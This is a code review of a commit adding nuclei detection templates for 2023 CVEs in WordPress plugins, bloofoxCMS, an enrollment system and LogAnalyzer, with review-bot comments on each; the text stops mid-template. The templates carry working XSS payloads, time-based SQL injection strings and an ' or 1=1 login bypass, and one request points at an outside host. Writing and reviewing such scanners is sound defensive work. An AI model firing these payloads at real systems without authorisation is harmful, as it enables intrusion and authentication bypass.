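+        GET /wp-admin/admin-ajax.php?action=the_champ_sharing_count&urls[%3Cimg%20src%3Dx%20onerror%3Dalert%28document%2Edomain%29%3E]=https://oast.pro HTTP/1.1
+        Host: {{Hostname}}
+
+    cookie-reuse: true
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code_2 == 200'
+          - 'contains(header_2, "text/html")'
+          - 'contains(body_2, "<img src=x onerror=alert(document.domain)>") && contains(body_2, "facebook_urls")'
+        condition: and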
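Review bot: The second raw request hard-codes `https://oast.pro` as the `urls[...]` value; if the sharing-count handler fetches that URL server-side, every scan sends target-originated traffic to a third-party domain the template does not control, and the matcher does not depend on that value at all. Use the `{{interactsh-url}}` variable or a clearly inert placeholder instead. The `authenticated` tag and the CVSS vector `PR:N` contradict each other; one of them should be revisited.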
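--- /dev/null
+++ b/PATH_NOT_SHOWN/CVE-2023-27922.yaml
@@ -0,0 +1,38 @@
+id: CVE-2023-27922
+
+info:
+  name: Newsletter < 7.6.9 - Cross-Site Scripting
+  author: r3Y3r53
+  severity: medium
+  description: |
+    The plugin does not escape generated URLs before outputting them in attributes, leading to Reflected Cross-Site Scripting which could be used against high privilege users such as administrators
+  reference:
+    - https://wpscan.com/vulnerability/eb6ff6f0-60fe-4345-b443-97fd4800418c
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-27922
+  metadata:
+    max-request: 1
+    verified: true
+  tags: cve,cve2023,wordpress,wp,wp-plugin,xss,newsletter,authenticated
+
+http:
+  - raw:
+      - |
+        POST /wp-login.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        log={{username}}&pwd={{password}}&wp-submit=Log+In
+
+      - |
+        GET /wp-admin/admin.php?page=newsletter_system_status&a%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1
+        Host: {{Hostname}}
+
+    cookie-reuse: true
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code_2 == 200'
+          - 'contains(body_2, "text/html")'
+          - 'contains(tolower(body_2), "_newsletter_")'
+          - 'contains(body_2, "><script>alert(document_domain)</script>")'
+        condition: and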
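Review bot: The last dsl line `'contains(body_2, "><script>alert(document_domain)</script>")'` looks for `document_domain`, but the request sends `document.domain`, so with `condition: and` the template can never match. The content-type check also inspects the body (`contains(body_2, "text/html")`) rather than the response header; `'contains(header_2, "text/html")'` is what the sibling templates use and is what the check intends. `max-request: 1` should be `max-request: 2` for the two raw requests, and the `wpscan` tag is missing although the reference is a WPScan advisory.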
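--- /dev/null
+++ b/PATH_NOT_SHOWN/CVE-2023-29439.yaml
@@ -0,0 +1,54 @@
+id: CVE-2023-29439
+
+info:
+  name: FooGallery plugin <= 2.2.35 - Cross-Site Scripting
+  author: theamanrawat
+  severity: medium
+  description: |
+    Reflected Cross-Site Scripting (XSS) vulnerability in FooPlugins FooGallery plugin <= 2.2.35 versions.
+  reference:
+    - https://lourcode.kr/posts/CVE-2023-29439-Analysis?_s_id=cve
+    - https://wordpress.org/plugins/foogallery/
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-29439
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.1
+    cve-id: CVE-2023-29439
+    cwe-id: CWE-79
+  metadata:
+    verified: "true"
+    publicwww-query: "/wp-content/plugins/foogallery/"
+    max-request: 2
+  tags: cve,cve2023,xss,wordpress,wp-plugin,wp,foogallery,authenticated
+
+http:
+  - raw:
+      - |
+        POST /wp-login.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        log={{username}}&pwd={{password}}&wp-submit=Log+In
+
+      - |
+        GET /wp-admin/post-new.php?post_type=foogallery&post=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
+        Host: {{Hostname}}
+
+    cookie-reuse: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'data-gallery_id="\"><script>alert(document.domain)</script>"'
+          - 'foogallery-image-edit-modal'
+        condition: and
+
+      - type: word
+        part: header
+        words:
+          - "text/html"
+
+      - type: status
+        status:
+          - 200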
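Review bot: `verified: "true"` is a quoted string whereas the other templates in this commit use the boolean `verified: true`; tooling that reads the field as a boolean will treat the string differently, so use `verified: true`. The same quoted form appears in CVE-2023-34751 and CVE-2023-34752. The body word `'data-gallery_id="\"><script>alert(document.domain)</script>"'` contains a literal backslash because it is single-quoted; if that backslash is intentional (the plugin escaping the quote in the attribute), a comment above `words:` saying so would keep the next editor from "fixing" it.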
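--- /dev/null
+++ b/PATH_NOT_SHOWN/CVE-2023-30868.yaml
@@ -0,0 +1,44 @@
+id: CVE-2023-30868
+
+info:
+  name: Tree Page View Plugin < 1.6.7 - Cross-Site Scripting
+  author: r3Y3r53
+  severity: medium
+  description: |
+    The CMS Tree Page View plugin for WordPress has a Reflected Cross-Site Scripting vulnerability up to version 1.6.7. This is due to the post_type parameter not properly escaping user input. As a result, users with administrator privileges or higher can inject JavaScript code that will execute whenever accessed.
+  reference:
+    - https://www.exploit-db.com/exploits/51507
+    - https://wpscan.com/vulnerability/407c62af-8e2d-441d-8332-0afad5d07014
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-30868
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.1
+    cwe-id: CWE-79
+    cve-id: CVE-2023-30868
+    cpe: cpe:2.3:a:cms_tree_page_view_project:cms_tree_page_view:*:*:*:*:*:wordpress:*:*
+  metadata:
+    verified: true
+    max-request: 1
+  tags: cve,cve2023,xss,wp,wordpress,wpscan,authenticated,exploitdb
+
+http:
+  - raw:
+      - |
+        POST /wp-login.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        log={{username}}&pwd={{password}}&wp-submit=Log+In
+
+      - |
+        GET /wp-admin/edit.php?page=cms-tpv-page-post&post_type=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
+        Host: {{Hostname}}
+
+    cookie-reuse: true
+    matchers:
+      - type: dsl
+        dsl:
+          - 'contains(content_type_2, "text/html")'
+          - 'contains(body_2, "%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E") && contains(body_2, "CMS Tree Page View")'
+          - 'status_code_2 == 200'
+        condition: and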
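Review bot: The body matcher looks for the URL-encoded form `%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E`, which only shows that the query string is echoed back, not that markup is rendered; an encoded echo is not executable, so this check can fire on hardened versions and says nothing about the real reflection. Match the decoded payload as the other XSS templates in this commit do, or add a comment explaining why the encoded form is the expected signal for this page. `info.name` says `< 1.6.7` while the description says `up to version 1.6.7`; the two should agree, and `max-request: 1` should be `2` for the two raw requests.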
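--- /dev/null
+++ b/PATH_NOT_SHOWN/CVE-2023-3219.yaml
@@ -0,0 +1,43 @@
+id: CVE-2023-3219
+
+info:
+  name: EventON Lite < 2.1.2 - Arbitrary File Download
+  author: r3Y3r53
+  severity: medium
+  description: |
+    The plugin does not validate that the event_id parameter in its eventon_ics_download ajax action is a valid Event, allowing unauthenticated visitors
+    to access any Post (including unpublished or protected posts) content via the ics export functionality by providing the numeric id of the post.
+  remediation: Fixed in version 2.1.2
+  reference:
+    - https://wpscan.com/vulnerability/72d80887-0270-4987-9739-95b1a178c1fd
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-3219
+    - https://packetstormsecurity.com/files/173992/WordPress-EventON-Calendar-4.4-Insecure-Direct-Object-Reference.html
+    - https://wordpress.org/plugins/eventon-lite/
+  metadata:
+    verified: true
+    max-request: 1
+    publicwww-query: "/wp-content/plugins/eventon-lite/"
+  tags: wpscan,cve,cve2023,wordpress,wp-plugin,wp,eventon-lite,bypass
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/wp-admin/admin-ajax.php?action=eventon_ics_download&event_id=1"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "BEGIN:VCALENDAR"
+          - "END:VCALENDAR"
+        condition: and
+
+      - type: word
+        part: header
+        words:
+          - "text/Calendar"
+
+      - type: status
+        status:
+          - 200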
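Review bot: The header word matcher `- "text/Calendar"` is case-sensitive by default and Content-Type casing varies between servers, so a `text/calendar` response is missed; add `case-insensitive: true` to that matcher or lower-case the word. `info.name` calls this an Arbitrary File Download while the description describes unauthenticated access to any post's content through the ICS export (an authorization bypass); the name should follow the description. There is no `classification:` block, unlike the sibling templates, and `event_id=1` assumes a post with that ID exists, which is worth a one-line comment above `path:`.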
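--- /dev/null
+++ b/PATH_NOT_SHOWN/CVE-2023-33584.yaml
@@ -0,0 +1,41 @@
+id: CVE-2023-33584
+
+info:
+  name: Enrollment System Project v1.0 - SQL Injection Authentication Bypass
+  author: r3Y3r53
+  severity: critical
+  description: |
+    Enrollment System Project V1.0, developed by Sourcecodester, has been found to be vulnerable to SQL Injection (SQLI) attacks. This vulnerability allows an attacker to manipulate the SQL queries executed by the application. The system fails to properly validate user-supplied input in the username and password fields during the login process, enabling an attacker to inject malicious SQL code. By exploiting this vulnerability, an attacker can bypass authentication and gain unauthorized access to the system.
+  reference:
+    - https://www.exploit-db.com/exploits/51501
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-33584
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2023-33584
+    cwe-id: CWE-89
+  metadata:
+    verified: true
+  tags: cve,cve2023,sqli,exploitdb,unauth,enrollment
+
+http:
+  - raw:
+      - |
+        POST /enrollment/ajax.php?action=login HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        username='+or+1%3D1+%23&password={{randstr}}
+
+      - |
+        GET /enrollment/index.php?page=home HTTP/1.1
+        Host: {{Hostname}}
+
+    cookie-reuse: true
+    matchers:
+      - type: dsl
+        dsl:
+          - 'contains(body_2, "Administrator") && contains(body_2, "Dashboard")'
+          - 'contains(content_type, "text/html")'
+          - 'status_code == 200'
+        condition: and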
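Review bot: The dsl mixes `body_2` with unsuffixed `content_type` and `status_code`; in a two-request template the intent is presumably the second response, so `'contains(content_type_2, "text/html")'` and `'status_code_2 == 200'` make that explicit instead of relying on which response the unsuffixed names resolve to. `metadata` also lacks `max-request: 2`, which the sibling templates declare.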
@ -0,0 +1,49 @@
|
||||||
|
id: CVE-2023-34751
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: bloofoxCMS v0.5.2.1 - SQL Injection
|
||||||
|
author: theamanrawat
|
||||||
|
severity: critical
|
||||||
|
description: |
|
||||||
|
bloofox v0.5.2.1 was discovered to contain a SQL injection vulnerability via the gid parameter at admin/index.php?mode=user&page=groups&action=edit.
|
||||||
|
reference:
|
||||||
|
- https://www.bloofox.com
|
||||||
|
- https://ndmcyb.hashnode.dev/bloofox-v0521-was-discovered-to-contain-many-sql-injection-vulnerability
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2023-34751
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||||
|
cvss-score: 9.8
|
||||||
|
cve-id: CVE-2023-34751
|
||||||
|
cwe-id: CWE-89
|
||||||
|
metadata:
|
||||||
|
verified: "true"
|
||||||
|
fofa-query: "Powered by bloofoxCMS"
|
||||||
|
max-request: 2
|
||||||
|
tags: cve,cve2023,sqli,bloofox,authenticated
|
||||||
|
|
||||||
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
POST /admin/index.php HTTP/2
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
|
username={{username}}&password={{password}}&action=login
|
||||||
|
|
||||||
|
- |
|
||||||
|
@timeout: 10s
|
||||||
|
POST /admin/index.php?mode=user&page=groups&action=edit HTTP/2
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
|
name=User&backend=0&content=0&settings=0&permissions=0&tools=0&demo=0&gid='+AND+(SELECT+7401+FROM+(SELECT(SLEEP(6)))hwrS)--+&name_old=User&send=Save
|
||||||
|
|
||||||
|
cookie-reuse: true
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- duration>=6
|
||||||
|
- contains(header_2, "text/html")
|
||||||
|
- contains(body_2, 'bloofoxCMS Admincenter')
|
||||||
|
condition: and
|
|
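Review bot: Both raw request lines in this template are written as `POST /admin/index.php HTTP/2`, while the sibling bloofox template for CVE-2023-34755 in this same commit writes `HTTP/1.1`; as far as I know nuclei's raw engine speaks HTTP/1.1 on the wire regardless of the token, so the `HTTP/2` version string is at best misleading and should read `POST /admin/index.php HTTP/1.1` (the CVE-2023-34752, -34753 and -34756 sections have the same request lines). In the metadata, `verified: "true"` is a quoted string where the rest of the commit uses the bare boolean, e.g. in the CVE-2023-34756 section; `verified: true` keeps the type consistent for any tooling that reads the field (also in the -34752, -34753 and -34755 sections). `matchers-condition: and` with a single matcher is redundant but harmless.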
@ -0,0 +1,49 @@
|
||||||
|
id: CVE-2023-34752
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: bloofoxCMS v0.5.2.1 - SQL Injection
|
||||||
|
author: theamanrawat
|
||||||
|
severity: critical
|
||||||
|
description: |
|
||||||
|
bloofox v0.5.2.1 was discovered to contain a SQL injection vulnerability via the lid parameter at admin/index.php?mode=settings&page=lang&action=edit.
|
||||||
|
reference:
|
||||||
|
- https://www.bloofox.com
|
||||||
|
- https://ndmcyb.hashnode.dev/bloofox-v0521-was-discovered-to-contain-many-sql-injection-vulnerability
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2023-34752
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||||
|
cvss-score: 9.8
|
||||||
|
cve-id: CVE-2023-34752
|
||||||
|
cwe-id: CWE-89
|
||||||
|
metadata:
|
||||||
|
verified: "true"
|
||||||
|
fofa-query: "Powered by bloofoxCMS"
|
||||||
|
max-request: 2
|
||||||
|
tags: cve,cve2023,sqli,bloofox,authenticated
|
||||||
|
|
||||||
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
POST /admin/index.php HTTP/2
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
|
username={{username}}&password={{password}}&action=login
|
||||||
|
|
||||||
|
- |
|
||||||
|
@timeout: 10s
|
||||||
|
POST /admin/index.php?mode=settings&page=lang&action=edit HTTP/2
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
|
name=English&flag=en.gif&filename=english.php&date=m%2Fd%2FY&datetime=m%2Fd%2FY+-+H%3Ai&token=en&lid='+AND+(SELECT+7401+FROM+(SELECT(SLEEP(6)))hwrS)--+&send=Save
|
||||||
|
|
||||||
|
cookie-reuse: true
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- duration>=6
|
||||||
|
- contains(header_2, "text/html")
|
||||||
|
- contains(body_2, 'bloofoxCMS Admincenter')
|
||||||
|
condition: and
|
|
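Review bot: The time-based check `duration>=6` is unindexed in a two-request chain, so it is not obvious from the template whether it measures the injected second request or the whole sequence; writing it as `- duration_2>=6` pins it to the response that carries the SLEEP payload, so a slow login step cannot satisfy the condition on its own (I believe the unindexed form resolves to the last response, but the explicit index removes the doubt). With `@timeout: 10s` the margin between a 6s sleep and the timeout is only 4s; on high-latency targets this will time out before the delay is observed, which is a missed detection rather than a false positive, but worth a short inline comment such as `# time-based probe: 6s sleep against a 10s timeout; raise @timeout on slow targets`.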
@ -0,0 +1,49 @@
|
||||||
|
id: CVE-2023-34753
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: bloofoxCMS v0.5.2.1 - SQL Injection
|
||||||
|
author: theamanrawat
|
||||||
|
severity: critical
|
||||||
|
description: |
|
||||||
|
bloofox v0.5.2.1 was discovered to contain a SQL injection vulnerability via the tid parameter at admin/index.php?mode=settings&page=tmpl&action=edit.
|
||||||
|
reference:
|
||||||
|
- https://www.bloofox.com
|
||||||
|
- https://ndmcyb.hashnode.dev/bloofox-v0521-was-discovered-to-contain-many-sql-injection-vulnerability
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2023-34753
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||||
|
cvss-score: 9.8
|
||||||
|
cve-id: CVE-2023-34753
|
||||||
|
cwe-id: CWE-89
|
||||||
|
metadata:
|
||||||
|
verified: "true"
|
||||||
|
fofa-query: "Powered by bloofoxCMS"
|
||||||
|
max-request: 2
|
||||||
|
tags: cve,cve2023,sqli,bloofox,authenticated
|
||||||
|
|
||||||
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
POST /admin/index.php HTTP/2
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
|
username={{username}}&password={{password}}&action=login
|
||||||
|
|
||||||
|
- |
|
||||||
|
@timeout: 10s
|
||||||
|
POST /admin/index.php?mode=settings&page=tmpl&action=edit HTTP/2
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
|
name=default&template=default.html&css=default.css&template_print=print.html&template_print_css=print.css&template_login=login.html&template_text=text.html&be=0&tid='+AND+(SELECT+7401+FROM+(SELECT(SLEEP(6)))hwrS)--+&send=Save
|
||||||
|
|
||||||
|
cookie-reuse: true
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- duration>=6
|
||||||
|
- contains(header_2, "text/html")
|
||||||
|
- contains(body_2, 'bloofoxCMS Admincenter')
|
||||||
|
condition: and
|
|
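Review bot: The three DSL expressions under `dsl:` are plain, unquoted scalars (`- duration>=6`, `- contains(header_2, "text/html")`, `- contains(body_2, 'bloofoxCMS Admincenter')`), whereas the other templates in this commit single-quote every DSL line (e.g. `- 'status_code == 200'`). Plain scalars happen to parse here, but an expression that later gains a `: ` or ` #` would silently change meaning, and the mixed style makes the bloofox set harder to diff against the rest of the repo; `- 'duration>=6'`, `- 'contains(header_2, "text/html")'` and `- 'contains(body_2, "bloofoxCMS Admincenter")'` match the prevailing convention.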
@ -0,0 +1,49 @@
|
||||||
|
id: CVE-2023-34755
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: bloofoxCMS v0.5.2.1 - SQL Injection
|
||||||
|
author: theamanrawat
|
||||||
|
severity: critical
|
||||||
|
description: |
|
||||||
|
bloofox v0.5.2.1 was discovered to contain a SQL injection vulnerability via the userid parameter at admin/index.php?mode=user&action=edit.
|
||||||
|
reference:
|
||||||
|
- https://www.bloofox.com
|
||||||
|
- https://ndmcyb.hashnode.dev/bloofox-v0521-was-discovered-to-contain-many-sql-injection-vulnerability
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2023-34755
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||||
|
cvss-score: 9.8
|
||||||
|
cve-id: CVE-2023-34755
|
||||||
|
cwe-id: CWE-89
|
||||||
|
metadata:
|
||||||
|
verified: "true"
|
||||||
|
fofa-query: "Powered by bloofoxCMS"
|
||||||
|
max-request: 2
|
||||||
|
tags: cve,cve2023,sqli,bloofox,authenticated
|
||||||
|
|
||||||
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
POST /admin/index.php HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
|
username={{username}}&password={{password}}&action=login
|
||||||
|
|
||||||
|
- |
|
||||||
|
@timeout: 10s
|
||||||
|
POST /admin/index.php?mode=user&action=edit HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
|
username={{username}}&password={{password}}&pwdconfirm=test&blocked=0&deleted=0&status=0&login_page=0&userid='+AND+(SELECT+7401+FROM+(SELECT(SLEEP(6)))hwrS)--+&send=Save
|
||||||
|
|
||||||
|
cookie-reuse: true
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- duration>=6
|
||||||
|
- contains(header_2, "text/html")
|
||||||
|
- contains(body_2, 'bloofoxCMS Admincenter')
|
||||||
|
condition: and
|
|
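Review bot: The second raw request submits a complete user-edit form (`password={{password}}&pwdconfirm=test&blocked=0&deleted=0&status=0&login_page=0`) around the injected `userid` value, so if the edit handler processes the remaining fields independently of the broken `userid` lookup, a scan may change the password, blocked/deleted flags or status of the account the scanner logged in with. That is a side effect a defender running this template against their own estate needs to know about; it is worth stating in the description or as an inline comment above the request, e.g. `# NOTE: submits the full user-edit form; may modify the scanning account on a vulnerable target`, and considering a payload that leaves the non-injected fields at their current values. I cannot tell from the template alone whether bloofox commits the other fields when `userid` is malformed, so treat this as something to confirm against a test instance.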
@ -0,0 +1,50 @@
|
||||||
|
id: CVE-2023-34756
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Bloofox v0.5.2.1 - SQL Injection
|
||||||
|
author: theamanrawat
|
||||||
|
severity: critical
|
||||||
|
description: |
|
||||||
|
Bloofox v0.5.2.1 was discovered to contain a SQL injection vulnerability via the cid parameter at admin/index.php?mode=settings&page=charset&action=edit.
|
||||||
|
reference:
|
||||||
|
- https://ndmcyb.hashnode.dev/bloofox-v0521-was-discovered-to-contain-many-sql-injection-vulnerability
|
||||||
|
- https://www.bloofox.com
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2023-34756
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||||
|
cvss-score: 9.8
|
||||||
|
cve-id: CVE-2023-34756
|
||||||
|
cwe-id: CWE-89
|
||||||
|
metadata:
|
||||||
|
verified: true
|
||||||
|
fofa-query: "Powered by bloofoxCMS"
|
||||||
|
max-request: 2
|
||||||
|
tags: cve,cve2023,sqli,bloofox,authenticated
|
||||||
|
|
||||||
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
POST /admin/index.php HTTP/2
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
|
username={{username}}&password={{password}}&action=login
|
||||||
|
|
||||||
|
- |
|
||||||
|
@timeout: 10s
|
||||||
|
POST /admin/index.php?mode=settings&page=charset&action=edit HTTP/2
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
|
name=ISO-8859-1&description=&cid=2'+AND+(SELECT+7401+FROM+(SELECT(SLEEP(6)))hwrS)--+&send=Save
|
||||||
|
|
||||||
|
cookie-reuse: true
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- duration>=6
|
||||||
|
- status_code == 200
|
||||||
|
- contains(header, "text/html")
|
||||||
|
- contains(body_2, 'Admincenter')
|
||||||
|
condition: and
|
|
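Review bot: The matcher mixes unindexed parts (`status_code == 200`, `contains(header, "text/html")`) with the indexed `body_2` in a two-request chain, so it is unclear from the template which response the status and header checks are applied to; the explicit `- 'status_code_2 == 200'` and `- 'contains(header_2, "text/html")'` make the intent unambiguous and match the other bloofox templates in this commit. The body check `contains(body_2, 'Admincenter')` is also weaker than the sibling `'bloofoxCMS Admincenter'`; using the longer string keeps the product fingerprint consistent and reduces coincidental matches on unrelated admin pages.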
@ -0,0 +1,32 @@
|
||||||
|
id: CVE-2023-36306
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Adiscon LogAnalyzer v.4.1.13 - Cross-Site Scripting
|
||||||
|
author: r3Y3r53
|
||||||
|
severity: medium
|
||||||
|
description: |
|
||||||
|
A Cross Site Scripting (XSS) vulnerability in Adiscon Aiscon LogAnalyzer through 4.1.13 allows a remote attacker to execute arbitrary code via the asktheoracle.php
|
||||||
|
reference:
|
||||||
|
- https://www.exploit-db.com/exploits/51643
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2023-36306
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||||
|
cvss-score: 6.1
|
||||||
|
cve-id: CVE-2023-36306
|
||||||
|
cwe-id: CWE-79
|
||||||
|
metadata:
|
||||||
|
verified: true
|
||||||
|
tags: cve,cve2023,xss,unauth,exploitdb,adiscon,adiscon-loganalyzer
|
||||||
|
|
||||||
|
http:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/loganalyzer/asktheoracle.php?type=domain&query=&uid=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- 'status_code == 200'
|
||||||
|
- 'contains(content_type, "text/html")'
|
||||||
|
- 'contains(body, "><script>alert(document.domain)</script>") && contains(body, "Adiscon LogAnalyzer")'
|
||||||
|
condition: and
|
|
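Review bot: The `metadata` block has no `max-request` entry, while the other single-GET templates in this commit declare it (the Ninja Forms template carries `max-request: 1`); adding `max-request: 1` keeps the request-budget metadata complete. The seven mooDating templates (CVE-2023-3843 through CVE-2023-3849) have the same omission. Separately, the description carries the typo "Adiscon Aiscon LogAnalyzer" and says a reflected XSS "allows a remote attacker to execute arbitrary code"; "execute arbitrary script in a victim's browser" describes CWE-79 accurately.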
@ -0,0 +1,49 @@
|
||||||
|
id: CVE-2023-37979
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Ninja Forms < 3.6.26 - Cross-Site Scripting
|
||||||
|
author: r3Y3r53
|
||||||
|
severity: medium
|
||||||
|
description: |
|
||||||
|
The plugin does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin
|
||||||
|
remediation: Fixed in version 3.6.26
|
||||||
|
reference:
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2023-37979
|
||||||
|
- https://wpscan.com/vulnerability/3c7c65e9-c4fd-4d98-ae16-77abffbf7348
|
||||||
|
- https://packetstormsecurity.com/files/173983/WordPress-Ninja-Forms-3.6.25-Cross-Site-Scripting.html
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||||
|
cvss-score: 6.1
|
||||||
|
cve-id: CVE-2023-37979
|
||||||
|
cwe-id: CWE-79
|
||||||
|
cpe: cpe:2.3:a:ninjaforms:ninja_forms:*:*:*:*:*:wordpress:*:*
|
||||||
|
metadata:
|
||||||
|
verified: true
|
||||||
|
max-request: 1
|
||||||
|
publicwww-query: "/wp-content/plugins/ninja-forms/"
|
||||||
|
tags: cve,cve2023,xss,wordpress,wpscan,authenticated,wp-plugin,wp
|
||||||
|
|
||||||
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
POST /wp-login.php HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
|
log={{username}}&pwd={{password}}&wp-submit=Log+In
|
||||||
|
|
||||||
|
- |
|
||||||
|
POST /wp-admin/admin-ajax.php HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
|
action=nf_batch_process&batch_type=import_form_template&extraData%5Btemplate%5D=formtemplate-contactformd&method_override=_respond&data=Mehran%7D%7D%3Cimg+src%3Donerror%3Dalert%28document.domain%29%3E
|
||||||
|
|
||||||
|
cookie-reuse: true
|
||||||
|
matchers:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- 'contains(content_type_2, "text/html")'
|
||||||
|
- 'contains(body_2, "<img src=onerror=alert(document.domain)>") && contains(body_2, "import_form_template")'
|
||||||
|
- 'status_code_2 == 200'
|
||||||
|
condition: and
|
|
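Review bot: `max-request: 1` does not match the template body, which sends two raw requests (the `/wp-login.php` login followed by the `/wp-admin/admin-ajax.php` call); it should be `max-request: 2`, as the other two-step templates in this commit declare. The matcher correctly scopes every check to the second response (`content_type_2`, `body_2`, `status_code_2`), so nothing else in the section depends on the count.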
@ -0,0 +1,31 @@
|
||||||
|
id: CVE-2023-3843
|
||||||
|
info:
|
||||||
|
name: mooDating 1.2 - Cross-site scripting
|
||||||
|
author: r3Y3r53
|
||||||
|
severity: medium
|
||||||
|
description: |
|
||||||
|
A vulnerability was found in mooSocial mooDating 1.2. It has been classified as problematic. Affected is an unknown function of the file /matchmakings/question of the component URL Handler. The manipulation leads to cross site scripting. It is possible to launch the attack remotely. VDB-235194 is the identifier assigned to this vulnerability. NOTE: We tried to contact the vendor early about the disclosure but the official mail address was not working properly.
|
||||||
|
reference:
|
||||||
|
- https://www.exploit-db.com/exploits/51628
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2023-3843
|
||||||
|
